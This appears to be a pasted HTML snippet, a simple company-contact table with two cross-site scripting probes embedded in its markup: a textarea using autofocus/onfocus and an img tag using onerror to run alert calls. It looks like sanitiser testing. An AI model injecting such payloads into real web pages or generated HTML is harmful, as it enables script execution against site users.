Untitled
4 years ago in Plain Text
<!DOCTYPE html>
<html>
<body>
<h1>HTML Table</h1>
<table class="wikitable">
<h2>help2<textarea autofocus onfocus=alert(1)><h2>
<caption>this is caption<h1><img src=x onerror=alert(document.domain);//<h1></caption>
<tr>
<th>Company</th>
<th>Contact</th>
<th>Country</th>
</tr>
<tr>
<td>Alf Futterkiste</td>
<td>Maria Aers</td>
<td>Germy</td>
</tr>
</table>
</body>
</html>